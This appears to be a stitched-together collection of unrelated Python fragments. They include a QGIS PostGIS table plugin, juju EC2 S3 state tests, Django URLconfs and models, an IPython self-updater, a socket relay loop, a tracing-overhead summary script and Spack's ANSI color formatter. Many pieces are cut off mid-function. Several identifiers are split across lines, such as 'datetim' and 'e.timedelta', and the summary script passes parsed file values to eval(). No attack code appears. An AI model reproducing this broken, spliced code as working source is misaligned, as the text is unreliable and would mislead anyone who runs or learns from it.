item.runRefreshMaterializedView() def hasLowercaseFieldNamesOption(self): return True class PGSchema(Schema): def __init__(self, row, db): Schema.__init__(self, db) self.oid, self.name, self.owner, self.perms, self.comment = row class PGTable(Table): def __init__(self, row, db, schema=None): Table.__init__(self, db, schema) self.name, schema_name, self._relationType, self.owner, self.estimatedRowCount, self.pages, self.comment = row self.isView = self._relationType in set(['v', 'm']) self.estimatedRowCount = int(self.estimatedRowCount) def runVacuumAnalyze(self): self.aboutToChange.emit() self.database().connector.runVacuumAnalyze((self.schemaName(), self.name)) # 
TODO: change only this item, not re-create all the tables in the schema/database self.schema().refresh() if self.schema() else self.database().refresh() def runRefreshMaterializedView(self): self.aboutToChange.emit() self.database().connector.runRefreshMaterializedView((self.schemaName(), self.name)) # TODO: change only this item, not re-create all the tables in the schema/database self.schema().refresh() if self.schema() else self.database().refresh() def runAction(self, action): action = str(action) if action.startswith("vacuumanalyze/"): if action == "vacuumanalyze/run": self.runVacuumAnalyze() return True elif action.startswith("rule/"): parts = action.split('/')
rule_name = parts[1] rule_action = parts[2] msg = u"Do you want to %s rule %s?" % (rule_action, rule_name) QApplication.restoreOverrideCursor() try: if QMessageBox.question(None, self.
tr("Table rule"), msg, QMessageBox.Yes | QMessageBox.No) == QMessageBox.No: return False finally: QApplication.setOverrideCursor(Qt.WaitCursor) if rule_action == "delete": self.aboutToChange.emit() self.database().connector.deleteTableRule(rule_name, (self.schemaName(), self.name)) self.refreshRules() return True elif action.startswith("refreshmaterializedview/"): if action == "refreshmaterializedview/run": self.runRefreshMaterializedView() return True return Table.runAction(self, action) def tableFieldsFactory(self, row, table): return PGTableField(row, table) def tableConstraintsFactory(self, row, table): return PGTableConstraint(row, table) def tableIndexesFactory(self, row, table): return PGTableIndex(row, table) def tableTriggersFactory(self, row, table): return PGTableTrigger(row, table) def tableRulesFactory(self, row, table): return PGTableRule(row, table) def info(self): from .info_model import PGTableInfo return PGTableInfo(self) def tableDataModel(self, parent): from .data_model import PGTableDataModel return PGTableDataModel(self, parent) def delete(self): self.aboutToChange.emit() if self.isView: ret = self.database().connector.deleteView((self.schemaName(), self.name), self._relationType == 'm') else: ret = self.database().connector.deleteTable((self.schemaName(), self.name)) if not ret: self.deleted.emit() return ret class PGVectorTable(PGTable, VectorTable): def __init__(self, row, db, schema=None): PGTable.__init__(self, row[:-4], db, schema) VectorTable.__init__(self, db, schema) self.geomColumn, self.geomType, self.geomDim, self.srid = row[-4:] def info(self): from .info_model import PGVectorTableInfo return PGVectorTableInfo(self) def runAction(self, action): if PGTable.runAction(self, action): return True return VectorTable.runAction(self, action) class PGRasterTable(PGTable, RasterTable): def __init__(self, row, db, schema=None): PGTable.__init__(self, row[:-6], db, schema) RasterTable.__init__(self, db, schema) self.geomColumn, 
self.pixelType, self.pixelSizeX, self.pixelSizeY, self.isExternal, self.srid = row[-6:] self.geomType = 'RASTER' def info(self): from .info_model import PGRasterTableInfo return PGRasterTableInfo(self) def gdalUri(self, uri=None): if not uri: uri = self.database().uri() schema = (u'schema=%s' % self.schemaName()) if self.schemaName() else '' dbname = (u'dbname=%s' % uri.database()) if uri.database() else '' host = (u'host=%s' % uri.host()) if uri.host() else '' user = (u'user=%s' % uri.username()) if uri.username() else '' passw = (u'password=%s' % uri.password()) if uri.password() else '' port = (u'port=%s' % uri.port()) if uri.port() else '' # Find first raster field col = '' for fld in self.fields(): if fld.dataType == "raster": col = u'column=%s' % fld.name break gdalUri = u'PG: %s %s %s %s %s mode=2 %s %s table=%s' % \ (dbname, host, user, passw, port, schema, col, self.name) return gdalUri def mimeUri(self): # QGIS has no provider for PGRasters, let's use GDAL uri = u"raster:gdal:%s:%s" % (self.name, re.sub(":", "\:", self.gdalUri())) return uri def toMapLayer(self): from qgis.core import QgsRasterLayer, QgsContrastEnhancement, QgsDataSourceUri, QgsCredentials rl = QgsRasterLayer(self.gdalUri(), self.name) if not rl.isValid(): err = rl.error().summary() uri = QgsDataSourceUri(self.database().uri()) conninfo = uri.connectionInfo(False) username = uri.username() password = uri.password() for i in range(3): (ok, username, password) = QgsCredentials.instance().get(conninfo, username, password, err) if ok: uri.setUsername(username) uri.setPassword(password) rl = QgsRasterLayer(self.gdalUri(uri), self.name) if rl.isValid():
from yaml import dump

from twisted.internet.defer import succeed, fail
from txaws.s3.exception import S3Error

from juju.lib.testing import TestCase
from juju.providers.ec2.tests.common import EC2TestMixin


class EC2StateTest(TestCase, EC2TestMixin):
    """Tests for saving/loading provider state in the EC2 S3 control bucket.

    Uses mocker's record/replay: each ``self.s3.<call>(...)`` before
    ``self.mocker.replay()`` records an expected call, and the following
    ``self.mocker.result(...)`` attaches its return value.  Expectation
    order is significant.
    """

    def setUp(self):
        EC2TestMixin.setUp(self)
        super(EC2StateTest, self).setUp()

    def test_save(self):
        """
        When passed some juju ec2 machine instances and asked to save,
        the machine, it will serialize the data to an s3 bucket.
        """
        instances = [self.get_instance("i-foobar", dns_name="x1.example.com")]
        state = dump(
            {"zookeeper-instances":
             [[i.instance_id, i.dns_name] for i in instances]})

        # Record: put_object succeeds.  (The trailing comma makes this
        # expression a 1-tuple; harmless, the value is discarded.)
        self.s3.put_object(
            self.env_name, "provider-state", state),
        self.mocker.result(succeed(state))
        self.mocker.replay()

        provider = self.get_provider()
        d = provider.save_state(
            {"zookeeper-instances":
             [[i.instance_id, i.dns_name] for i in instances]})

        def assert_state(saved_state):
            self.assertEqual(saved_state, state)
        d.addCallback(assert_state)
        return d

    def test_save_non_existant_bucket(self):
        """
        When saving instance information to S3 the EC2 provider will
        create a namespaced bucket specific to the provider instance,
        if it does not already exist.
        """
        instances = [self.get_instance("i-foobar", dns_name="x1.example.com")]
        state = dump(
            {"zookeeper-instances":
             [[i.instance_id, i.dns_name] for i in instances]})

        # Record: first put_object fails with NoSuchBucket ...
        self.s3.put_object(
            self.env_name, "provider-state", state),
        error = S3Error("<error/>", 404)
        error.errors = [{"Code": "NoSuchBucket"}]
        self.mocker.result(fail(error))
        # ... the provider then creates the bucket and retries the put.
        self.s3.create_bucket(self.env_name)
        self.mocker.result(succeed({}))
        self.s3.put_object(
            self.env_name, "provider-state", state),
        self.mocker.result(succeed(state))
        self.mocker.replay()

        provider = self.get_provider()
        d = provider.save_state(
            {"zookeeper-instances":
             [[i.instance_id, i.dns_name] for i in instances]})

        def assert_state(saved_state):
            self.assertEqual(saved_state, state)
        d.addCallback(assert_state)
        return d

    def test_load(self):
        """
        The provider bootstrap will load and deserialize any saved
        state from s3.
        """
        self.s3.get_object(self.env_name, "provider-state")
        self.mocker.result(succeed(dump({"zookeeper-instances": []})))
        self.mocker.replay()

        provider = self.get_provider()
        d = provider.load_state()

        def assert_load_value(value):
            self.assertEqual(value, {"zookeeper-instances": []})
        d.addCallback(assert_load_value)
        return d

    def test_load_nonexistant_bucket(self):
        """
        When loading saved state from s3, the system returns False if
        the s3 control bucket does not exist.
        """
        self.s3.get_object(self.env_name, "provider-state")
        error = S3Error("<error/>", 404)
        error.errors = [{"Code": "NoSuchBucket"}]
        self.mocker.result(fail(error))
        self.mocker.replay()

        provider = self.get_provider()
        d = provider.load_state()

        def assert_load_value(value):
            self.assertIdentical(value, False)
        d.addCallback(assert_load_value)
        return d

    def test_load_nonexistant(self):
        """
        When loading saved state from S3, the provider bootstrap
        gracefully handles the scenario where there is no saved state.
        """
        # An empty YAML list is treated the same as "no state": False.
        self.s3.get_object(self.env_name, "provider-state")
        self.mocker.result(succeed(dump([])))
        self.mocker.replay()

        provider = self.get_provider()
        d = provider.load_state()

        def assert_load_value(value):
            self.assertIdentical(value, False)
        d.addCallback(assert_load_value)
        return d
# Root URLconf: routes /admin/ to the Django admin, delegates everything
# else to the ``cdc`` app, and appends a pattern serving MEDIA_URL files
# via django.conf.urls.static.static().
from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.conf import settings

from django.contrib import admin

urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'isucdc2.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),

    url(r'^admin/', include(admin.site.urls)),
    # Catch-all prefix: every remaining URL is handed to the cdc app.
    url(r'^', include('cdc.urls', namespace="cdc")),
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
""" 33. get_or_create() ``get_or_create()`` does what it says: it tries to look up an object with the given parameters. If an object isn't found, it creates one with the given parameters. """ from __future__ import unicode_literals from django.db import models from django.utils.encoding import python_2_unicode_compatible @python_2_unicode_compatible class
Person(models.Model)
: first_name = models.CharField(max_length=100) last_name = models.CharField(max_length=100) birthday = models.DateField() def __str__(self): return '%s %s' % (self.first_name, self.last_name) class DefaultPerson(models.Model): first_name = models.CharField(max_length=100, default="Anonymous") class ManualPrimaryKeyTest(models.Model): id = models.IntegerField(primary_key=True) data = models.CharField(max_length=100) class Profile(models.Model): person = models.ForeignKey(Person, primary_key=True) class Tag(models.Model): text = models.CharField(max_length=255, unique=True) class Thing(models.Model): name = models.CharField(max_length=256) tags = models.ManyToManyField(Tag) class Publisher(models.Model): name = models.CharField(max_length=100) class Author(models.Model): name = models.CharField(max_length=100) class Book(models.Model): name = models.CharField(max_length=100) authors = models.ManyToManyField(Author, related_name='books') publisher = models.ForeignKey(Publisher, related_name='books', db_column="publisher_id_column")
""" smashlib.plugins.cli_update The handler for "smash --update".
This will default to using whatever branch is already checked out """ from fabric import api from goulash.python import splitext, ops from smashlib import get_smash from smashlib.util import CLOpt from smashlib.plugins import Plugin from smashlib.util.events import receives_event from smashlib.channels import C_SMASH_INIT_COMPLET
E from smashlib import data class UpdateSmash(Plugin): """ This plugin is responsible for doing the work whenever smash is invoked with "--update". """ update = None verbose = True # do not change, user needs some feedback def get_cli_arguments(self): return [ CLOpt( args = ['--update'], kargs = dict(default=False, action='store_true')) ] def use_argv(self, args): self.update = args.update @receives_event(C_SMASH_INIT_COMPLETE) def consider_updating(self): if self.update: try: self.run_update() finally: self.smash.shell.run_cell('exit') def run_update(self): """ """ smash_dir = data.SMASH_DIR with api.lcd(smash_dir): with api.settings(api.hide('warnings'), warn_only=True, quiet=True): result = api.local('git diff-index --quiet HEAD --') changed = (1 == result.return_code) if changed: error = "aborting due to local changes in {0}" self.report(error.format(smash_dir)) else: api.local('git pull') api.local('./bin/pip install -r requirements.txt') def load_ipython_extension(ip): """ called by %load_ext magic """ return UpdateSmash(get_ipython()).install()
from django.core.management.base import BaseCommand

from lizard_blockbox import import_helpers


class Command(BaseCommand):
    """Management command that merges the measure shapes into one json."""

    args = ""
    help = "Merge the measure shapes to get one json."

    def handle(self, *args, **kwargs):
        # Delegates all work to the import helper, handing it this
        # command's stdout (presumably for progress/log output -- the
        # helper's behavior is defined in lizard_blockbox).
        import_helpers.merge_measures_blockbox(self.stdout)
import clr
clr.AddReference('RevitAPI')
from Autodesk.Revit.DB import *

# Input: Revit material element(s) handed in by the hosting environment
# (IN/UnwrapElement/OUT are presumably Dynamo node globals -- verify).
materials = UnwrapElement(IN[0])

# Collect one property list per attribute, in the same order as the input.
classlist = [m.MaterialClass for m in materials]
colorlist = [m.Color for m in materials]
glowlist = [True if m.Glow else False for m in materials]
shinylist = [m.Shininess for m in materials]
smoothlist = [m.Smoothness for m in materials]
translist = [m.Transparency for m in materials]

# Output tuple: (class, color, glow, shininess, smoothness, transparency).
OUT = (classlist, colorlist, glowlist, shinylist, smoothlist, translist)
# The MIT License (MIT) # # Copyright shifvb 2015 # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE.
import select


def read_write(client, target):
    """Relay bytes in both directions between two connected sockets.

    Runs until a select() error condition is reported, either peer closes
    its end, or no data has flowed for ~60 seconds (20 select rounds with
    a 3-second timeout each).

    client, target: connected socket objects.
    Returns None; the sockets are left open for the caller to close.
    """
    time_out_max = 20  # idle rounds before giving up (20 * 3s = 60s)
    socs = [client, target]
    count = 0
    done = False
    while not done:
        count += 1
        (recv, _, error) = select.select(socs, [], socs, 3)
        if error:
            break
        for in_ in recv:
            data = in_.recv(8192)
            # Forward to the opposite socket.
            out = target if in_ is client else client
            if data:
                # FIX: sendall() loops until the whole buffer is written;
                # the original send() may transmit only a prefix.
                out.sendall(data)
                count = 0
            else:
                # FIX: recv() returning b'' means the peer closed its end;
                # the original ignored this and spun until the idle timeout.
                done = True
        if count == time_out_max:
            break
import sys
import random
import collections
import itertools
import bisect


# @include
def nonuniform_random_number_generation(values, probabilities):
    """Pick one element of ``values`` at random, where ``values[i]`` is
    chosen with probability ``probabilities[i]``.

    Works by building the cumulative distribution [0, p0, p0+p1, ...] and
    locating a uniform random draw in it with binary search.
    """
    cumulative = [0.0]
    cumulative.extend(itertools.accumulate(probabilities))
    slot = bisect.bisect(cumulative, random.random()) - 1
    return values[slot]
# @exclude


def main():
    # n comes from the command line, or is random when not supplied.
    if len(sys.argv) == 2:
        n = int(sys.argv[1])
    else:
        n = random.randint(1, 50)
    T = [float(i) for i in range(n)]

    # Build a random probability vector that sums to 1.
    P = []
    remaining = 1.0
    for _ in range(n - 1):
        p = random.uniform(0.0, remaining)
        P.append(p)
        remaining -= p
    P.append(remaining)

    print(*T)
    print(*P)
    print(nonuniform_random_number_generation(T, P))

    # Test. Perform the nonuniform random number generation for n * k_times
    # times and calculate the distribution of each bucket.
    k_times = 100000
    draws = n * k_times
    counts = collections.Counter(
        int(nonuniform_random_number_generation(T, P))
        for _ in range(draws))
    for i in range(n):
        print(counts[i] / draws, P[i])
        assert abs(counts[i] / draws - P[i]) < 0.01


if __name__ == '__main__':
    main()
""" def toLocal(dt, offset = 8): dt: datetime offset: default 8 china time """
import datetime def toLocal(dt, offset = 8): localDateTime = dt + datetim
e.timedelta(hours=offset) return localDateTime if __name__ == '__main__': now = datetime.datetime.utcnow() print now print toLocal(now) print now
DING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import argparse import csv import math import pprint import statistics import numpy import re # Utilit
y functions. def GetFileValues(filename): values = [] with open(filename, 'r') as filecontent: if 'overhead-babeltrace' in filename: for line in filecontent.readlines():
match = re.match(r'(.*)real\s0m(.*)s.*', line, re.M|re.I) if (match): values.append(eval(match.group(2))) if 'overhead-find' in filename: for line in filecontent.readlines(): match = re.match(r'(.*)real\s0m(.*)s.*', line, re.M|re.I) if (match): values.append(eval(match.group(2))) elif 'overhead-cpu' in filename: for line in filecontent.readlines(): match = re.match(r'(.*)total time:\s*(.*)s.*', line, re.M|re.I) if (match): values.append(eval(match.group(2))) elif 'overhead-lighttpd' in filename: for line in filecontent.readlines(): match = re.match(r'(.*)Time taken for tests:\s*(.*) seconds.*', line, re.M|re.I) if (match): values.append(eval(match.group(2))) else: first = True reader = csv.reader(filecontent) for row in reader: if first: first = False continue v = eval(row[0]) if 'overhead-mongo' in filename: v = v / 1000000000 values.append(v) return values def GetXYFileValues(filename): x = [] y = [] with open(filename, 'r') as filecontent: first = True reader = csv.reader(filecontent) for row in reader: if first: first = False continue y.append(eval(row[0])) x.append(eval(row[1])) return {'x': x, 'y': y} def GetXYFileStdDev(filename): values = GetXYFileValues(filename) grouped = {} for i in range(0, len(values['x'])): if values['x'][i] not in grouped: grouped[values['x'][i]] = [] grouped[values['x'][i]].append(values['y'][i]) total_stddev = 0 for x, v in grouped.items(): stddev = math.sqrt(statistics.variance(v)) if stddev > total_stddev: total_stddev = stddev return stddev def GetFileMean(filename): values = GetFileValues(filename) return statistics.mean(values) def GetFileStdDev(filename): values = GetFileValues(filename) return math.sqrt(statistics.variance(values)) def RemoveBase(values, base, numactions): values[:] = [(value - base) / numactions for value in values] return values # Experiment: GETPID def SummaryGetPid(results_dir): NUM_ACTIONS = 100000000 base_mean = GetFileMean(results_dir + '/getpid-base.csv') emptyprobes_mean = GetFileMean(results_dir + 
'/getpid-emptyprobes.csv') bookkeeping_mean = GetFileMean(results_dir + '/getpid-bookkeeping.csv') signal_mean = GetFileMean(results_dir + '/getpid-signal.csv') base_stddev = GetFileStdDev(results_dir + '/getpid-base.csv') emptyprobes_stddev = GetFileStdDev(results_dir + '/getpid-emptyprobes.csv') bookkeeping_stddev = GetFileStdDev(results_dir + '/getpid-bookkeeping.csv') signal_stddev = GetFileStdDev(results_dir + '/getpid-signal.csv') print('EXPERIMENT: GETPID (base stddev: {0:.1f})'.format(base_stddev / base_mean)) print('Empty probes: {0:.0f} ns (stddev={1:.1f})'.format((emptyprobes_mean - base_mean) / NUM_ACTIONS, 100 * emptyprobes_stddev / emptyprobes_mean)) print('Bookkeeping: {0:.0f} ns (stddev={1:.1f})'.format((bookkeeping_mean - base_mean) / NUM_ACTIONS, 100 * bookkeeping_stddev / bookkeeping_mean)) print('Signal: {0:.0f} ns (stddev={1:.1f})'.format((signal_mean - base_mean) / NUM_ACTIONS, 100 * signal_stddev / signal_mean)) print() # Experiment: UST def SummaryUST(results_dir): NUM_ACTIONS = 100000000 base_mean = GetFileMean(results_dir + '/ust-base.csv') tracepoint_mean = GetFileMean(results_dir + '/ust-tracepoint.csv') tracepoint_stddev = GetFileStdDev(results_dir + '/ust-tracepoint.csv') print('EXPERIMENT: UST TRACEPOINT') print('UST event: {0:.0f} ns (stddev: {1:.1f})'.format((tracepoint_mean - base_mean) / NUM_ACTIONS, 100 * tracepoint_stddev / tracepoint_mean)) print('') # Experiment: LIBUNWIND def SummaryLibunwind(results_dir): NUM_ACTIONS = 1 base = GetFileMean(results_dir + '/libunwind-base.csv') minregs = GetXYFileValues(results_dir + '/libunwind-optimal-withcache.csv') minregs_nocache = GetXYFileValues(results_dir + '/libunwind-optimal-nocache.csv') master_nocache = GetXYFileValues(results_dir + '/libunwind-nocache.csv') base_stddev = GetXYFileStdDev(results_dir + '/libunwind-base.csv') minregs_stddev = GetXYFileStdDev(results_dir + '/libunwind-optimal-withcache.csv') minregs_nocache_stddev = GetXYFileStdDev(results_dir + 
'/libunwind-optimal-nocache.csv') master_nocache_stddev = GetXYFileStdDev(results_dir + '/libunwind-nocache.csv') minregs['y'] = RemoveBase(minregs['y'], base, NUM_ACTIONS) minregs_nocache['y'] = RemoveBase(minregs_nocache['y'], base, NUM_ACTIONS) master_nocache['y'] = RemoveBase(master_nocache['y'], base, NUM_ACTIONS) minregs['x'] = RemoveBase(minregs['x'], 0, 1) minregs_nocache['x'] = RemoveBase(minregs_nocache['x'], 0, 1) master_nocache['x'] = RemoveBase(master_nocache['x'], 0, 1) minregs_reg = numpy.polyfit(minregs['x'], minregs['y'], 1) minregs_nocache_reg = numpy.polyfit(minregs_nocache['x'], minregs_nocache['y'], 1) master_nocache_reg = numpy.polyfit(master_nocache['x'], master_nocache['y'], 1) print('EXPERIMENT: LIBUNWIND') print('Minimal regs, with cache: frame = {0:.0f} ns, base = {1:.0f} ns, stddev={2:.0f} ns'.format(minregs_reg[0], minregs_reg[1], minregs_stddev)) print('Minimal regs, no cache: frame = {0:.0f} ns, base = {1:.0f} ns, stddev={2:.0f} ns'.format(minregs_nocache_reg[0], minregs_nocache_reg[1], minregs_nocache_stddev)) print('Master, no cache : frame = {0:.0f} ns, base = {1:.0f} ns, stddev={2:.0f} ns'.format(master_nocache_reg[0], master_nocache_reg[1], master_nocache_stddev)) print() # Experiment: OVERHEAD def SummaryOverhead(results_dir): APPS = ['cpu', 'babeltrace', 'find', 'mongo'] TESTS = ['nothing', 'kernel', 'notracing-cpusyscalls', 'ust-cpusyscalls', 'critical-cpusyscalls'] FANCY_TESTS = ['Base ', 'Traditionnal tracing ', 'Generating stack events / No tracing ', 'Tracing stack events ', 'Tracing stack and critical path events '] print('EXPERIMENT: OVERHEAD') results = {} for app in APPS: base = GetFileMean(results_dir + '/overhead-' + app + '/nothing.csv') results[app] = {} for test in TESTS: mean = GetFileMean(results_dir + '/overhead-' + app + '/' + test + '.csv') stddev = GetFileStdDev(results_dir + '/overhead-' + app + '/' + test + '.csv') overhead = ((mean / base) - 1) * 100 results[app][test] = {'mean': mean, 'stddev': stddev, 
'overhead': overhead} print('TABLE: TIME') for test_i in range(0, len(TESTS)): line = [FANCY_TESTS[test_i]] for app in APPS: line.append(results[app][TESTS[test_i]]['mean']) line.append(results[app][TESTS[test_i]]['stddev']) print('{0}& {1:.2f} & {2:.2f} & {3:.2f} & {4:.2f} & {5:.2f} & {6:.2f} & {7:.2f} & {8:.2f} \\\\\\hline'.format(*line)) print() print('TABLE: PERCENT') for test_i in range(0, len(TESTS)): line = [FANCY_TESTS[test_i]] for app in APPS: line.append(results[app][TESTS[test_i]]['overhead']) print('{0}& {1:.1f} & {2:.1f} & {3:.1f} & {4:.1f} \\\\\\hline'.format(*line)) print() if __name__ == "__main__": parser = argparse.ArgumentParser(description='Generate summary from experimental results.') parser.add_argument('results', metavar="<path/to/results>", help='Path to results directory.') args = parser.parse_ar
# Copyright (c) 2010-2013 by Yaco Sistemas <goinnn@gmail.com> or <pmartin@yaco.es>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

# URLconf for the example_extra_fields test app: an index view plus an
# edit view keyed by resource id.

try:
    from django.conf.urls import include, patterns, url
except ImportError:  # Django < 1.4
    from django.conf.urls.defaults import include, patterns, url

urlpatterns = patterns('testing.example_extra_fields.views',
    url(r'^$', 'extra_index', name='extra_index'),
    url(r'^(?P<resource_id>\w+)/$', 'extra_edit', name="extra_edit"),
)
# coding=utf-8
# URL: https://pymedusa.com
#
# This file is part of Medusa.
#
# Medusa is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Medusa is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Medusa. If not, see <http://www.gnu.org/licenses/>.

"""Custom exceptions used or raised by indexer_api"""

from tvdb_api.tvdb_exceptions import (tvdb_exception, tvdb_error, tvdb_userabort,
                                      tvdb_shownotfound, tvdb_showincomplete,
                                      tvdb_seasonnotfound, tvdb_episodenotfound,
                                      tvdb_attributenotfound)

# Name lists of the generic indexer exceptions and their tvdb counterparts.
indexerExcepts = ["indexer_exception", "indexer_error", "indexer_userabort", "indexer_shownotfound", "indexer_showincomplete",
                  "indexer_seasonnotfound", "indexer_episodenotfound", "indexer_attributenotfound"]

tvdbExcepts = ["tvdb_exception", "tvdb_error", "tvdb_userabort", "tvdb_shownotfound", "tvdb_showincomplete",
               "tvdb_seasonnotfound", "tvdb_episodenotfound", "tvdb_attributenotfound"]

# link API exceptions to our exception handler
# Each generic indexer_* name is simply an alias for the matching tvdb_*
# exception class, so callers can catch indexer-agnostic exceptions.
indexer_exception = tvdb_exception
indexer_error = tvdb_error
indexer_userabort = tvdb_userabort
indexer_attributenotfound = tvdb_attributenotfound
indexer_episodenotfound = tvdb_episodenotfound
indexer_seasonnotfound = tvdb_seasonnotfound
indexer_shownotfound = tvdb_shownotfound
indexer_showincomplete = tvdb_showincomplete
ICENSE files for our notice and the LGPL. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License (as # published by the Free Software Foundation) version 2.1, February 1999. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and # conditions of the GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA ############################################################################## """ This file implements an expression syntax, similar to ``printf``, for adding ANSI colors to text. See ``colorize()``, ``cwrite()``, and ``cprint()`` for routines that can generate colored output. ``colorize`` will take a string and replace all color expressions with ANSI control codes. If the ``isatty`` keyword arg is set to False, then the color expressions will be converted to null strings, and the returned string will have no color. ``cwrite`` and ``cprint`` are equivalent to ``write()`` and ``print()`` calls in python, but they colorize their output. If the ``stream`` argument is not supplied, they write to ``sys.stdout``. Here are some example color expressions: ========== ============================================================ Expression Meaning ========== ============================================================ @r Turn on red coloring @R Turn on bright red coloring @*{foo} Bold foo, but don't change text color @_{bar} Underline bar, but don't change text color @*b Turn on bold, blue text @_B Turn on bright blue text with an underline @. Revert to plain formatting @*g{green} Print out 'green' in bold, green text, then reset to plain. 
@*ggreen@. Print out 'green' in bold, green text, then reset to plain. ========== ============================================================ The syntax consists of: ========== ================================================= color-expr '@' [style] color-code '{' text '}' | '@.' | '@@' style '*' | '_' color-code [krgybmcwKRGYBMCW] text .* ========== ================================================= '@' indicates the start of a color expression. It can be followed by an optional * or _ that indicates whether the font should be bold or underlined. If * or _ is not provided, the text will be plain. Then an optional color code is supplied. This can be [krgybmcw] or [KRGYBMCW], where the letters map to black(k), red(r), green(g), yellow(y), blue(b), magenta(m), cyan(c), and white(w). Lowercase letters denote normal ANSI colors and capital letters denote bright ANSI colors. Finally, the color expression can be followed by text enclosed in {}. If braces are present, only the text in braces is colored. If the braces are NOT present, then just the control codes to enable the color will be output. The console can be reset later to plain text with '@.'. To output an @, use '@@'. To output a } inside braces, use '}}'. 
""" import re import sys from contextlib import contextmanager class ColorParseError(Exception): """Raised when a color format fails to parse.""" def __init__(self, message): super(ColorParseError, self).__init__(message) # Text styles for ansi codes styles = {'*': '1', # bold '_': '4', # underline None: '0'} # plain # Dim and bright ansi colors colors = {'k': 30, 'K': 90, # black 'r': 31, 'R': 91, # red 'g': 32, 'G': 92, # green 'y': 33, 'Y': 93, # yellow 'b': 34, 'B': 94, # blue 'm': 35, 'M': 95, # magenta 'c': 36, 'C': 96, # cyan 'w': 37, 'W': 97} # white # Regex to be used for color formatting color_re = r'@(?:@|\.|([*_])?([a-zA-Z])?(?:{((?:[^}]|}})*)})?)' # Mapping from color arguments to values for tty.set_color color_when_values = { 'always': True, 'auto': None, 'never': False } # Force color; None: Only color if stdout is a tty # True: Always colorize output, False: Never colorize output _force_color = None def _color_when_value(when): """Raise a ValueError for an invalid color setting. Valid values are 'always', 'never', and 'auto', or equivalently, True, False, and None. """ if when in color_when_values: return color_when_values[when] elif when not in color_when_values.values(): raise ValueError('Invalid color setting: %s' % when) return when def get_color_when(): """Return whether commands should print color or not.""" if _force_color is not None: return _force_color return sys.stdout.isatty() def set_color_when(when): """Set when color should be applied. Options are: * True or 'always': always print color * False or 'never': never print color * None or 'auto': only print color if sys.stdout is a tty. 
""" global _force_color _force_color = _color_when_value(when) @contextmanager def color_when(value): """Context manager to temporarily use a particular color setting.""" old_value = value set_color_when(value) yield set_color_when(old_value) class match_to_ansi(object): def __init__(self, color=True): self.color = _color_when_value(color) def escape(self, s): """Returns a TTY escape sequence for a color""" if self.color: return "\033[%sm" % s else: return '' def __call__(self, match): """Convert a match object generated by ``color_re`` into an ansi color code. This can be used as a handler in ``re.sub
``. """ style, color, text = match.groups() m = match.group(0) if m == '@@': return '@' elif m == '@.': return self.escape(0) elif m == '@': raise ColorParseError("Incomplete color format: '%s' in %s" % (m, match.string)) string = styles[style] if color: if color not in colors: raise Color
ParseError("invalid color specifier: '%s' in '%s'" % (color, match.string)) string += ';' + str(colors[color]) colored_text = '' if text: colored_text = text + self.escape(0) return self.escape(string) + colored_text def colorize(string, **kwargs): """Replace all color expressions in a string with ANSI control codes. Args: string (str): The string to replace Returns: str: The filtered string Keyword Arguments: color (bool): If False, output will be plain text without control codes, for output to non-console devices. """ color = _color_when_value(kwargs.get('color', get_color_when())) return re.sub(color_re, match_to_ansi(color), string) def clen(string): """Return the length of a string, excluding ansi color sequences.""" return len(re.sub(r'\033[^m]*m', '', string)) def cextra(string): """"Length of extra color characters in a string""" return len(''.join(re.findall(r'\033[^m]*m', string))) def cwrite(string, stream=sys.stdout, color=None): """Replace all color expressions in string with ANSI control codes and write the result to the stream. If color is False, this will write plain text with o color. If True, then it will always write colored output. If not supplied, then it will be set based on stream.isatty(). """ if color is None: color = get_color_when() stream.write(colorize(string, color=color)) def cprint(string, stream=sys.stdout, color=None): """Same as cwrite, but writes a trailing newline to the stream.""" cwrite(string + "\n", stream, color) def cescape(string): 